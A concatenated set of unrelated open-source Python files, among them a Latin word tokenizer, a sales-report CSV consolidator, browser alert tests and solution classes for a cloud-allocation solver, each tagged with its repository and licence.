model_name='counter',
name='pf',
field=models.OneToOneField(to='myapp.Value', related_name='8'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='voltage',
field=models.OneToOneField(to='myapp.Value', related_name='6'),
preserve_default=True,
),
]
| mpetyx/energagement | energagement/myapp/migrations/0001_initial.py | Python | mit | 6,753 |
|
# -*- coding: utf-8 -*-
"""Functions called when player or monsters dies."""
import colors
from random import randint
from game_messages import Message
from game_states import GameStates
from render_functions import RenderOrder
from texts import Texts
def kill_player(player):
"""Change player's properties and return death message."""
player.char = '%'
player.color = colors.get('white')
player.base_name = 'remains of ' + 'YOU'
player.tile_path = 'fighter/blood{}.png'.format(randint(1, 5))
return Message(Texts.get_text('player_death_log'), colors.get('red')), GameStates.PLAYER_DEAD
def kill_monster(monster):
"""Change monster's properties and return death message."""
if monster.name == 'the sorceress':
death_message = Message(Texts.get_text(
'boss_death', monster.name.title()), colors.get('red'))
else:
txt = Texts.get_text('monster_death', Texts.get_text(monster.name).title())
death_message = Message(txt, colors.get('orange'))
monster.char = '%'
monster.color = colors.get('white')
monster.blocks = False
monster.fighter = None
monster.ai = None
monster.base_name = 'remains of ' + monster.name
monster.tile_path = 'fighter/blood{}.png'.format(randint(1, 5))
monster.render_order = RenderOrder.CORPSE
return death_message
| kuraha4/roguelike-tutorial-python | src/death_functions.py | Python | mit | 1,349 |
|
# old_python.py
class OldPython(object):
def __init__(self, age):
if age < 50:
raise ValueError("%d isn't old" % age)
self.age = age
def hiss(self):
if self.age < 60:
return "sss sss"
elif self.age < 70:
return "SSss SSss"
else:
return "sss... *cough* *cough*"
| evandrix/Splat | doc/existing-work/pythoscope/wild_pythons/old_python.py | Python | mit | 359 |
|
class TodoooError(Exception):
"""Catch all error for the Todooo application"""
pass
class InvalidCommandError(TodoooError):
"""An error where the command is not recognized by the REPL"""
def __str__(self):
return 'You entered an invalid command'
class NoListError(TodoooError):
"""An error where a list has not been established"""
def __str__(self):
return 'You must specify a list to use'
class InvalidListError(TodoooError):
"""An error where a list does not exist"""
def __str__(self):
return 'The list you specified does not exist'
class SameItemError(TodoooError):
"""An error to signify that the same item was selected"""
def __str__(self):
return 'The items you selected are the same'
class InvalidArgumentError(TodoooError):
"""An error where the argument type is not what was expected"""
def __str__(self):
return 'You entered an invalid argument'
class ExpectedItemError(InvalidArgumentError):
"""An error where a numeric Item ID was expected"""
def __str__(self):
return 'Please enter an item ID'
class InvalidItemError(InvalidArgumentError):
"""An error where the Item ID is out of range"""
def __str__(self):
return 'Please enter an item ID from this list'
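# Illustrative use in the REPL loop (not part of this module): catching the
# base class reports any of these errors uniformly, e.g.
#   try:
#       raise InvalidCommandError()
#   except TodoooError as err:
#       print(err)   # -> You entered an invalid command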
| dansackett/Todooo | todooo/errors.py | Python | mit | 1,302 |
|
# coding: utf-8
__author__ = 'Rafael Borges'
'''
Example testing the use and reading of graphs
'''
grafo = {
'1': ['2', '5'],
'2': ['1', '3', '5'],
'3': ['2', '4'],
'4': ['3', '5', '6'],
'5': ['1', '2', '4'],
'6': ['4']
}
def encontra_caminho(grafo, inicio, fim, caminho=None):
if caminho is None:
caminho = []
caminho += [inicio]
if inicio == fim:
return caminho
if not inicio in grafo:
return None
for aresta in grafo[inicio]:
if aresta not in caminho:
novo_caminho = encontra_caminho(grafo, aresta, fim, caminho)
if novo_caminho:
return novo_caminho
return None
if __name__ == '__main__':
print(grafo)
caminho = encontra_caminho(grafo, '1', '6')
print(caminho)
caminho = encontra_caminho(grafo, '6', '1')
print(caminho)
caminho = encontra_caminho(grafo, '5', '3')
print(caminho)
| Razborges/algGrafos | Trabalho2/teste_grafo.py | Python | mit | 916 |
|
# Python script to organize PixelPOS "Profit by Summary Group" sales reports
# tidied up by saleswiz.py into single tables for chart production.
import os
import csv
import sys
from glob import glob
from collections import OrderedDict
from copy import deepcopy
# *sales_clean.csv columns.
cols = ['Category', 'Subcategory', 'Item', 'Quantity', 'Value',]
def flip(out_base, files):
"""Consolidate monthly or weekly sales_clean.csv files into single table."""
dl = []
q = OrderedDict([(c, []) for c in cols[:3]])
for i, f in enumerate(files):
dl.append(OrderedDict())
for c in cols:
dl[i][c] = []
try:
with open(f, 'rb') as in_f:
in_d = csv.DictReader(in_f, fieldnames=cols, delimiter=',', quotechar='"')
for row in in_d:
[dl[i][c].append(row[c].strip()) for c in cols]
in_f.close()
except:
print 'Problem reading file "%s".' % f.split('/')[-1]
return False
period = f.split('/')[-1].split('sales')[0]
q[period] = []
for r in xrange(1, len(dl[0][cols[0]])):
[q[c].append(dl[0][c][r]) for c in cols[:3]]
v = deepcopy(q)
for i, d in enumerate(dl):
for r in xrange(1, len(dl[0][cols[0]])):
if d['Quantity'][r]:
q[q.keys()[i+3]].append(d['Quantity'][r])
v[v.keys()[i+3]].append(d['Value'][r])
else:
q[q.keys()[i+3]].append('')
v[v.keys()[i+3]].append('')
ok_q = write_file(q, out_base + 'quantity.csv', q.keys())
ok_v = write_file(v, out_base + 'value.csv', v.keys())
return ok_q and ok_v
def write_file(d, out_file, columns):
"""Write output csv file."""
try:
with open(out_file, 'wb') as out_f:
out_d = csv.DictWriter(out_f, fieldnames=OrderedDict([(c, None) for c in columns]))
out_d.writeheader()
for r in xrange(len(d[columns[0]])):
out_d.writerow(OrderedDict([(c, d[c][r]) for c in columns]))
out_f.close()
return True
except:
print 'Problem writing file "%s".' % out_file.split('/')[-1]
return False
def main():
try:
freq = sys.argv[1]
except:
freq = ''
freq = freq.strip().lower()[:1] if freq else ''
if freq not in ['m', 'w', 'b',]:
print 'Specify monthly, weekly or both.'
return
reports_dir_win = 'C:\\Users\\Malky\\Documents\\BD\\Reports\\sales'
reports_dir_py = reports_dir_win.decode('utf-8').replace('\\','/')
monthly = reports_dir_py + '/monthly_'
weekly = reports_dir_py + '/weekly_'
clean_files = glob(reports_dir_py + '/' + '*sales_clean.csv')
m_files = [f.decode('utf-8').replace('\\','/') for f in clean_files if 'we' not in f]
w_files = [f.decode('utf-8').replace('\\','/') for f in clean_files if 'we' in f]
if freq == 'm':
ok_m = flip(monthly, m_files)
print 'Monthly File OK.' if ok_m else 'Monthly File No Bueno.'
elif freq == 'w':
ok_w = flip(weekly, w_files)
print 'Weekly File OK.' if ok_w else 'Weekly File No Bueno.'
else:
ok_m = flip(monthly, m_files)
print 'Monthly File OK.' if ok_m else 'Monthly File No Bueno.'
ok_w = flip(weekly, w_files)
print 'Weekly File OK.' if ok_w else 'Weekly File No Bueno.'
if __name__ == '__main__':
main()
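# Usage (matches the argument handling in main(); only the first letter of the
# argument is inspected):
#   python flipwiz.py monthly
#   python flipwiz.py weekly
#   python flipwiz.py both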
| malwatt/saleswiz | flipwiz.py | Python | mit | 3,460 |
|
from post import views as post_views
from utils.helpers import search_keyword, \
get_id_from_response, \
get_suggested_id_from_response, get_search_object
def search(request):
domain = request.GET.get('domain')
if domain == 'post':
return search_in_post(request)
elif domain == 'category':
return search_in_category(request)
def search_in_post(request):
keyword = request.GET.get("keyword")
response = search_keyword(keyword)
id_list = get_id_from_response(response)
suggested_id_list = get_suggested_id_from_response(response.suggest.post_suggester)
for suggested_id in suggested_id_list:
for s_id in suggested_id:
id_list.append(s_id)
return post_views.get_search_results(request, id_list)
def search_in_category(request):
keyword = request.GET.get("keyword")
es_client = get_search_object()
result_set = es_client.query("match", categories=keyword)
response = result_set.execute()
id_list = get_id_from_response(response)
return post_views.get_search_results(request, id_list)
| Prakash2403/Blog | search/views.py | Python | mit | 1,090 |
|
# MIT License
#
# Copyright (c) 2015-2021 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selenium.common.exceptions import NoAlertPresentException
from tests.integration.helpers.givenpage import GivenPage
def test_can_accept_alert(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="alert('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
session_browser.switch_to.alert.accept()
try:
session_browser.switch_to.alert.accept()
assert False, 'actual: alert presents, expected: alert not present'
except NoAlertPresentException:
assert True
def test_can_dismiss_confirm_dialog(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="confirm('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
session_browser.switch_to.alert.dismiss()
try:
session_browser.switch_to.alert.accept()
assert False, 'actual: alert presents, expected: alert not present'
except NoAlertPresentException:
assert True
def test_alert_is_present(session_browser):
GivenPage(session_browser.driver).opened_with_body(
"""
<p>
<input id="alert_btn" type="button" onclick="alert('Good morning')" value="Run">
</p>"""
)
session_browser.element("#alert_btn").click()
try:
session_browser.switch_to.alert.accept()
assert True
except NoAlertPresentException:
assert False, 'actual: alert not present, expected: alert is present'
| yashaka/selene | tests/integration/browser__switch_to__alert_test.py | Python | mit | 2,778 |
|
""" Constants file """
API_URL = 'https://graph.facebook.com/v2.9/me/messages'
NEWS_URL = 'https://newsapi.org/v1/'
| MichaelYusko/Bot-Chucky | bot_chucky/constants.py | Python | mit | 117 |
|
"""Language-specific word tokenizers. Primary purpose is to handle enclitics.
Re: latin
Starter lists have been included to handle the Latin enclitics
(-que, -ne, -ue/-ve, -cum). These lists are based on high-frequency vocabulary
and have been supplemented on a as-needed basis; i.e. they are not
comprehensive. Additions to the exceptions list are welcome. PJB
"""
from nltk.tokenize.punkt import PunktLanguageVars
__author__ = ['Patrick J. Burns <patrick@diyclassics.org>',
'Kyle P. Johnson <kyle@kyle-p-johnson.com>']
__license__ = 'MIT License. See LICENSE.'
class WordTokenizer: # pylint: disable=too-few-public-methods
"""Tokenize according to rules specific to a given language."""
def __init__(self, language):
"""Take language as argument to the class. Check availability and
setup class variables."""
self.language = language
self.available_languages = ['latin']
assert self.language in self.available_languages, \
"Specific tokenizer not available for '{0}'. Only available for: '{1}'.".format(self.language, # pylint: disable=line-too-long
self.available_languages) # pylint: disable=line-too-long
if self.language == 'latin':
self.enclitics = ['que', 'n', 'ne', 'ue', 've', 'cum','st']
self.inclusions = []
cum_inclusions = ['mecum', 'tecum', 'secum', 'nobiscum', 'vobiscum', 'quocum', 'quicum', 'quibuscum']
self.exceptions = self.enclitics
que_exceptions = []
n_exceptions = []
ne_exceptions = []
ue_exceptions = []
ve_exceptions = []
cum_exceptions = []
st_exceptions = []
# quisque
que_exceptions += ['quisque', 'quidque', 'quicque', 'quodque', 'cuiusque', 'cuique',
'quemque', 'quoque', 'quique', 'quaeque', 'quorumque', 'quarumque',
'quibusque', 'quosque', 'quasque']
# uterque
que_exceptions += ['uterque', 'utraque', 'utrumque', 'utriusque', 'utrique', 'utrumque',
'utramque', 'utroque', 'utraque', 'utrique', 'utraeque', 'utrorumque',
'utrarumque', 'utrisque', 'utrosque', 'utrasque']
# quiscumque
que_exceptions += ['quicumque', 'quidcumque', 'quodcumque', 'cuiuscumque', 'cuicumque',
'quemcumque', 'quamcumque', 'quocumque', 'quacumque', 'quicumque',
'quaecumque', 'quorumcumque', 'quarumcumque', 'quibuscumque',
'quoscumque', 'quascumque']
# unuscumque
que_exceptions += ['unusquisque', 'unaquaeque', 'unumquodque', 'unumquidque',
'uniuscuiusque', 'unicuique', 'unumquemque', 'unamquamque', 'unoquoque',
'unaquaque']
# plerusque
que_exceptions += ['plerusque', 'pleraque', 'plerumque', 'plerique', 'pleraeque',
'pleroque', 'pleramque', 'plerorumque', 'plerarumque', 'plerisque',
'plerosque', 'plerasque']
# misc
que_exceptions += ['absque', 'abusque', 'adaeque', 'adusque', 'aeque', 'antique', 'atque',
'circumundique', 'conseque', 'cumque', 'cunque', 'denique', 'deque',
'donique', 'hucusque', 'inique', 'inseque', 'itaque', 'longinque',
'namque', 'oblique', 'peraeque', 'praecoque', 'propinque',
'qualiscumque', 'quandocumque', 'quandoque', 'quantuluscumque',
'quantumcumque', 'quantuscumque', 'quinque', 'quocumque',
'quomodocumque', 'quomque', 'quotacumque', 'quotcumque',
'quotienscumque', 'quotiensque', 'quotusquisque', 'quousque', 'relinque',
'simulatque', 'torque', 'ubicumque', 'ubique', 'undecumque', 'undique',
'usque', 'usquequaque', 'utcumque', 'utercumque', 'utique', 'utrimque',
'utrique', 'utriusque', 'utrobique', 'utrubique']
ne_exceptions += ['absone', 'acharne', 'acrisione', 'acumine', 'adhucine', 'adsuetudine',
'aeetine', 'aeschynomene', 'aesone', 'agamemnone', 'agmine', 'albane',
'alcyone', 'almone', 'alsine', 'amasene', 'ambitione', 'amne', 'amoene',
'amymone', 'anadyomene', 'andrachne', 'anemone', 'aniene', 'anne',
'antigone', 'aparine', 'apolline', 'aquilone', 'arachne', 'arne',
'arundine', 'ascanione', 'asiane', 'asine', 'aspargine', 'babylone',
'barine', 'bellone', 'belone', 'bene', 'benigne', 'bipenne', 'bizone',
'bone', 'bubone', 'bulbine', 'cacumine', 'caligine', 'calymne', 'cane',
'carcine', 'cardine', 'carmine', 'catacecaumene', 'catone', 'cerne',
'certamine', 'chalbane', 'chamaedaphne', 'chamaemyrsine', 'chaone',
'chione', 'christiane', 'clymene', 'cognomine', 'commagene', 'commune',
'compone', 'concinne', 'condicione', 'condigne', 'cone', 'confine',
'consone', 'corone', 'crastine', 'crepidine', 'crimine', 'crine',
'culmine', 'cupidine', 'cyane', 'cydne', 'cyllene', 'cyrene', 'daphne',
'depone', 'desine', 'dicione', 'digne', 'dine', 'dione', 'discrimine',
'diutine', 'dracone', 'dulcedine', 'elatine', 'elephantine', 'elleborine',
'epidamne', 'erigone', 'euadne', 'euphrone', 'euphrosyne', 'examine',
'faune', 'femine', 'feminine', 'ferrugine', 'fine', 'flamine', 'flumine',
'formidine', 'fragmine', 'fraterne', 'fulmine', 'fune', 'germane',
'germine', 'geryone', 'gorgone', 'gramine', 'grandine', 'haecine',
'halcyone', 'hammone', 'harundine', 'hedone', 'helene', 'helxine',
'hermione', 'heroine', 'hesione', 'hicine', 'hicne', 'hierabotane',
'hippocrene', 'hispane', 'hodierne', 'homine', 'hominesne', 'hortamine',
'hucine', 'humane', 'hunccine', 'huncine', 'iasione', 'iasone', 'igne',
'imagine', 'immane', 'immune', 'impoene', 'impone', 'importune', 'impune',
'inane', 'inconcinne', 'indagine', 'indigne', 'inferne', 'inguine',
'inhumane', 'inpone', 'inpune', 'insane', 'insigne', 'inurbane', 'ismene',
'istucine', 'itone', 'iuuene', 'karthagine', 'labiene', 'lacedaemone',
'lanugine', 'latine', 'legione', 'lene', 'lenone', 'libidine', 'limine',
'limone', 'lumine', 'magne', 'maligne', 'mane', 'margine', 'marone',
'masculine', 'matutine', 'medicamine', 'melpomene', 'memnone', 'mesene',
'messene', 'misene', 'mitylene', 'mnemosyne', 'moderamine', 'moene',
'mone', 'mortaline', 'mucrone', 'munimine', 'myrmidone', 'mytilene',
'necne', 'neptune', 'nequene', 'nerine', 'nocturne', 'nomine', 'nonne',
'nullane', 'numine', 'nuncine', 'nyctimene', 'obscene', 'obsidione',
'oenone', 'omine', 'omne', 'oppone', 'opportune', 'ordine', 'origine',
'orphne', 'oxymyrsine', 'paene', 'pallene', 'pane', 'paraetacene',
'patalene', 'pectine', 'pelagine', 'pellene', 'pene', 'perbene',
'perbenigne', 'peremne', 'perenne', 'perindigne', 'peropportune',
'persephone', 'phryne', 'pirene', 'pitane', 'plane', 'pleione', 'plene',
'pone', 'praefiscine', 'prasiane', 'priene', 'priuigne', 'procne',
'proditione', 'progne', 'prone', 'propone', 'pulmone', 'pylene', 'pyrene',
'pythone', 'ratione', 'regione', 'religione', 'remane', 'retine', 'rhene',
'rhododaphne', 'robigine', 'romane', 'roxane', 'rubigine', 'sabine',
'sane', 'sanguine', 'saturne', 'seditione', 'segne', 'selene', 'semine',
'semiplene', 'sene', 'sepone', 'serene', 'sermone', 'serrane', 'siccine',
'sicine', 'sine', 'sithone', 'solane', 'sollemne', 'somne', 'sophene',
'sperne', 'spiramine', 'stamine', 'statione', 'stephane', 'sterne',
'stramine', 'subpone', 'subtegmine', 'subtemine', 'sulmone', 'superne',
'supine', 'suppone', 'susiane', 'syene', 'tantane', 'tantine', 'taprobane',
'tegmine', 'telamone', 'temne', 'temone', 'tene', 'testudine', 'theophane',
'therone', 'thyone', 'tiberine', 'tibicine', 'tiburne', 'tirone',
'tisiphone', 'torone', 'transitione', 'troiane', 'turbine', 'turne',
'tyrrhene', 'uane', 'uelamine', 'uertigine', 'uesane', 'uimine', 'uirgine',
'umbone', 'unguine', 'uolumine', 'uoragine', 'urbane', 'uulcane', 'zone']
n_exceptions += ['aenean', 'agmen', 'alioquin', 'an', 'attamen', 'carmen', 'certamen',
'cognomen', 'crimen', 'dein', 'discrimen', 'en', 'epitheton', 'exin',
'flumen', 'forsan', 'forsitan', 'fulmen', 'iason', 'in', 'limen',
'liquamen', 'lumen', 'nomen', 'non', 'numen', 'omen', 'orion', 'quin',
'semen', 'specimen', 'tamen', 'titan']
ue_exceptions += ['agaue', 'ambigue', 'assidue', 'aue', 'boue', 'breue', 'calue', 'caue',
'ciue', 'congrue', 'contigue', 'continue', 'curue', 'exigue', 'exue',
'fatue', 'faue', 'fue', 'furtiue', 'gradiue', 'graue', 'ignaue',
'incongrue', 'ingenue', 'innocue', 'ioue', 'lasciue', 'leue', 'moue',
'mutue', 'naue', 'neue', 'niue', 'perexigue', 'perspicue', 'pingue',
'praecipue', 'praegraue', 'prospicue', 'proterue', 'remoue', 'resolue',
'saeue', 'salue', 'siue', 'solue', 'strenue', 'sue', 'summoue',
'superflue', 'supplicue', 'tenue', 'uiue', 'ungue', 'uoue']
ve_exceptions += ['agave', 'ave', 'bove', 'breve', 'calve', 'cave', 'cive', 'curve', 'fave',
'furtive', 'gradive', 'grave', 'ignave', 'iove', 'lascive', 'leve', 'move',
'nave', 'neve', 'nive', 'praegrave', 'prospicve', 'proterve', 'remove',
'resolve', 'saeve', 'salve', 'sive', 'solve', 'summove', 'vive', 'vove']
st_exceptions += ['abest', 'adest', 'ast', 'deest', 'est', 'inest', 'interest', 'post', 'potest', 'prodest', 'subest', 'superest']
self.exceptions = list(set(self.exceptions
+ que_exceptions
+ ne_exceptions
+ n_exceptions
+ ue_exceptions
+ ve_exceptions
+ st_exceptions
))
self.inclusions = list(set(self.inclusions
+ cum_inclusions))
def tokenize(self, string):
"""Tokenize incoming string."""
punkt = PunktLanguageVars()
generic_tokens = punkt.word_tokenize(string)
# Rewrite as an if-else block for exceptions rather than separate list comprehensions
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'nec' else ['c', item[:-1]])] # Handle 'nec' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'sodes' else [item[0]+'i', 'audes'])] # Handle 'sodes' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'sultis' else [item[0]+'i', 'vultis'])] # Handle 'sultis' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'satin' else [item[:-1] + 's', 'ne'])] # Handle 'satin' as a special case.
generic_tokens = [x for item in generic_tokens for x in ([item] if item.lower() != 'scin' else [item[:-1] + 's', 'ne'])] # Handle 'scin' as a special case.
specific_tokens = []
for generic_token in generic_tokens:
is_enclitic = False
if generic_token not in self.exceptions:
for enclitic in self.enclitics:
if generic_token.endswith(enclitic):
if enclitic == 'cum':
if generic_token.lower() in self.inclusions:
specific_tokens += [enclitic] + [generic_token[:-len(enclitic)]]
else:
specific_tokens += [generic_token]
elif enclitic == 'n':
specific_tokens += [generic_token[:-len(enclitic)]] + ['ne']
elif enclitic == 'st':
if generic_token.endswith('ust'):
specific_tokens += [generic_token[:-len(enclitic)+1]] + ['est']
else:
# Does not handle 'similist', 'qualist', etc. correctly
specific_tokens += [generic_token[:-len(enclitic)]] + ['est']
else:
specific_tokens += [enclitic] + [generic_token[:-len(enclitic)]]
is_enclitic = True
break
if not is_enclitic:
specific_tokens.append(generic_token)
return specific_tokens
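# Illustrative example (not in the original file): given the exception lists
# above, WordTokenizer('latin').tokenize('arma virumque cano') detaches the
# '-que' enclitic and fronts it, yielding ['arma', 'que', 'virum', 'cano'].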
def nltk_tokenize_words(string, attached_period=False):
"""Wrap NLTK's tokenizer PunktLanguageVars(), but make final period
its own token.
>>> nltk_tokenize_words("Sentence 1. Sentence 2.")
['Sentence', '1', '.', 'Sentence', '2', '.']
Optionally keep NLTK's output with the period attached:
>>> nltk_tokenize_words("Sentence 1. Sentence 2.", attached_period=True)
['Sentence', '1.', 'Sentence', '2.']
TODO: Run some tests to determine whether there is a large penalty for
re-calling PunktLanguageVars() for each use of this function. If so, this
will need to become a class, perhaps inheriting from the PunktLanguageVars
object. Maybe integrate with WordTokenizer.
"""
assert isinstance(string, str), "Incoming string must be type str."
punkt = PunktLanguageVars()
tokens = punkt.word_tokenize(string)
if attached_period:
return tokens
new_tokens = []
for word in tokens:
if word.endswith('.'):
new_tokens.append(word[:-1])
new_tokens.append('.')
else:
new_tokens.append(word)
return new_tokens
| coderbhupendra/cltk | cltk/tokenize/word.py | Python | mit | 15,959 |
|
# coding: utf-8
"""Classes for storing and reporting solutions of malloovia problems."""
from typing import Union, NamedTuple, Optional, List, Sequence, Tuple
from enum import IntEnum
from functools import singledispatch
import pulp # type: ignore
from .model import (
remove_namedtuple_defaultdoc,
PerformanceValues,
InstanceClass,
App,
Problem,
)
class Status(IntEnum):
"Possible status of malloovia's solution"
unsolved = 0
optimal = 1
infeasible = 2
integer_infeasible = 3
overfull = 4
trivial = 5
aborted = 6
cbc_error = 7
unknown = 8
def pulp_to_malloovia_status(status: int) -> Status:
"""Receives a PuLP status code and returns a Malloovia :class:`Status`."""
if status == pulp.LpStatusInfeasible:
r = Status.infeasible
elif status == pulp.LpStatusNotSolved:
r = Status.aborted
elif status == pulp.LpStatusOptimal:
r = Status.optimal
elif status == pulp.LpStatusUndefined:
r = Status.integer_infeasible
else:
r = Status.unknown
return r
class MallooviaHistogram(dict):
"""This class stores a multi-dimensional histogram, providing the same
interface than a standard dict whose keys are workload tuples and the
values are the count of the number of times that the tuple is observed
in the computed period."""
apps: Optional[Tuple[App, ...]] = None
"""The apps attribute stores a tuple with references to the apps involved
in the workload. The order of this tuple must match the order of workloads for
of each tuple which acts as key in the histogram"""
def __missing__(self, key):
# Default value for missing keys is zero
return 0
def __repr__(self):
return "MallooviaHistogram with %d values" % len(self)
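# Illustrative use (not part of the original file): keys are per-app workload
# tuples and missing keys read as zero, so counting observations is simply
#   h = MallooviaHistogram()
#   h[(30, 5)] += 1    # __missing__ supplies 0; the key is stored with count 1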
@remove_namedtuple_defaultdoc
class MallooviaStats(NamedTuple):
"""Stores data related to the Malloovia solver."""
gcd: bool
"bool: whether GCD technique was used or not."
status: Status
":class:`.Status`: status of the solution."
gcd_multiplier: float = 1.0
"""float: the multiplier used in GCD technique (defaults to 1.0)."""
frac_gap: Optional[float] = None
"""float: the fracGap passed to cbc solver (defaults to None)."""
max_seconds: Optional[float] = None
"""float: the maxSeconds passed to cbc solver (defaults to None)."""
lower_bound: Optional[float] = None
"""float: the lower bound of the solution as reported by cbc when the
optimal solution is not available (defaults to None)."""
@remove_namedtuple_defaultdoc
class SolvingStats(NamedTuple):
"""Stores the statistics that can be gathered from a solution
of Phase I, or one single timeslot in Phase II."""
algorithm: MallooviaStats
""":class:`.MallooviaStats`: additional info related to the particular
algorithm used to solve the problem."""
creation_time: float
"""float: time required to create the LP problem."""
solving_time: float
"""float: time required to solve the LP problem."""
optimal_cost: float
"""float: optimal cost as reported by the LP solver, or None if no solution
was found."""
@remove_namedtuple_defaultdoc
class GlobalSolvingStats(NamedTuple):
"""Stores the global statistics for Phase II, which are a sum of the
statistics of each timeslot."""
creation_time: float
"""float: sum of the time required to create the LP problem
for each timeslot."""
solving_time: float
"""float: sum of the time required to solve the LP problem
for each timeslot."""
optimal_cost: float
"""float: sum of the optimal costs as reported by the LP problem
for each timeslot."""
status: Status
""":class:`.Status`: global status computed from the status of
each timeslot."""
default_algorithm: Optional[str] = None
"""Currently unused"""
@remove_namedtuple_defaultdoc
class ReservedAllocation(NamedTuple):
"""Stores the number of reserved instances to allocate during the whole reservation
period."""
instance_classes: Tuple[InstanceClass, ...]
"""List[:class:`.InstanceClass`, ...]: list of reserved instance classes
in the allocation."""
    vms_number: Tuple[float, ...]
    """Tuple[float, ...]: tuple of numbers giving how many instances of each
    instance class are to be reserved. The corresponding instance class is
    obtained from the ``instance_classes`` attribute using the same index."""
@remove_namedtuple_defaultdoc
class AllocationInfo(NamedTuple):
"""Stores the allocation for a series of timeslots. It can be a single
timeslot, or the sequence of allocations for the whole reservation period."""
values: Tuple[Tuple[Tuple[float, ...], ...], ...]
"""Tuple[Tuple[Tuple[float, ...], ...], ...]: contains a list with one element
per timeslot. Each element in this sequence is a list (with one element
per app), which is in turn a list (with one element per instance class).
These values are numbers which can represent the number of instance
classes of that type to be allocated for that app during that timeslot,
or the cost associated with these instance classes, or the performance
given by these instance classes, depending on the ``units`` field.
    So, for example, if ``units`` is ``"vms"``, then ``values[2][1][3]``
    represents the number of VMs of instance class 3 to be allocated
    for application 1 during timeslot 2.
Note that, if the allocation contains a single timeslot, it is still
necessary to specify the index (0) in the first dimension,
e.g. ``vms_number[0][1][3]``.
To match the indexes in those arrays to actual instance classes and
apps, the attributes ``instance_classes`` and ``apps`` should be used.
So, for the above example, the application would be ``apps[1]`` and
the instance class would be ``instance_classes[3]``. If required,
the workload for that particular timeslot (2) can also be retrieved from
``workload_tuples[2]``."""
units: str
"""str: a string identifying the kind of information stored in the ``values``
field. It can be ``"vms"`` (number of VM instances), ``"cost"`` or any
currency (cost of these instances) or ``"rph"`` (performance of these
instances)."""
apps: Sequence[App]
"""Sequence[:class:`.App`]: is a list of apps to give meaning to the second
index in ``values``."""
instance_classes: Sequence[InstanceClass]
"""Sequence[:class:`.InstanceClass`]: is a list of instance classes to give
meaning to the third index in ``values``."""
workload_tuples: Sequence[Tuple[float, ...]]
"""Sequence[Tuple[float, ...]]: is a list of workload tuples to give meaning to the
first index in ``values``. Each element is a tuple with as many values
as apps, being each one the workload for each app."""
repeats: List[int] = []
"""List[int]: number of repetitions of each workload_tuple, for the case
in which the allocation is per load-level (histogram). It can be an empty
list (default value) for the case in which the allocation is per time-slot."""
def __repr__(self):
d0 = len(self.values)
if self.values:
d1 = len(self.values[0])
else:
d1 = 0
if d1:
d2 = len(self.values[0][0])
else:
d2 = 0
return "<{} {}x{}x{}>".format(self.__class__.__name__, d0, d1, d2)
@remove_namedtuple_defaultdoc
class SolutionI(NamedTuple):
"""Stores a solution for phase I."""
id: str
"str: arbitrary id for this object."
problem: Problem
""":class:`.Problem`: reference to the problem which originated
this solution."""
solving_stats: SolvingStats
""":class:`.SolvingStats`: statistics about this solution."""
allocation: AllocationInfo
""":class:`.AllocationInfo`: allocation provided in this solution."""
reserved_allocation: ReservedAllocation
""":class:`.ReservedAllocation`: allocation for reserved instances only."""
@remove_namedtuple_defaultdoc
class SolutionII(NamedTuple):
"""Stores a solution for phase II."""
id: str
"str: arbitrary id for this object."
problem: Problem
""":class:`.Problem`: reference to the problem which originated
this solution."""
solving_stats: Sequence[SolvingStats]
""":Sequence[class:`.SolvingStats`]: list of the SolvingStats for
each timeslot."""
global_solving_stats: GlobalSolvingStats
""":class:`.GlobalSolvingStats`: summary of the solving stats."""
previous_phase: SolutionI
""":class:`.SolutionI`: reference to the solution of the previous phase."""
allocation: AllocationInfo
""":class:`.AllocationInfo`: allocation for the whole period, built from the
allocations of the individual timeslots."""
@singledispatch
def compute_allocation_cost(alloc: AllocationInfo) -> AllocationInfo:
"""Computes the cost of each element of the allocation.
Args:
alloc: the allocation whose cost has to be computed
Returns:
Another allocation in which the ``values`` field contains
the cost of that element (it is the original ``values``
multiplied by the cost of the corresponding instance class)
"""
costs = []
for row in alloc.values:
costs_row = []
for app_alloc in row:
costs_app = []
for i, _ in enumerate(app_alloc):
costs_app.append(app_alloc[i] * alloc.instance_classes[i].price)
costs_row.append(tuple(costs_app))
costs.append(tuple(costs_row))
return alloc._replace(values=tuple(costs), units="cost")
@compute_allocation_cost.register(SolutionI)
@compute_allocation_cost.register(SolutionII)
def _(solution: Union[SolutionI, SolutionII]) -> AllocationInfo:
return compute_allocation_cost(solution.allocation)
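# Hedged usage note (not part of the original module): for an allocation whose
# units are "vms", each resulting entry is values[t][a][i] multiplied by
# instance_classes[i].price:
#     cost_alloc = compute_allocation_cost(solution)  # or an AllocationInfo
#     cost_alloc.units   # -> "cost"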
@singledispatch
def compute_allocation_performance(
alloc: AllocationInfo, performances: PerformanceValues
) -> AllocationInfo:
"""Computes the performance of each element of the allocation.
Args:
alloc: the allocation whose performance has to be computed
performances: the set of performances for each pair of instance class
and application
Returns:
Another allocation in which the ``values`` field contains
the performance of that element (it is the original ``values``
multiplied by the performance of the corresponding instance class
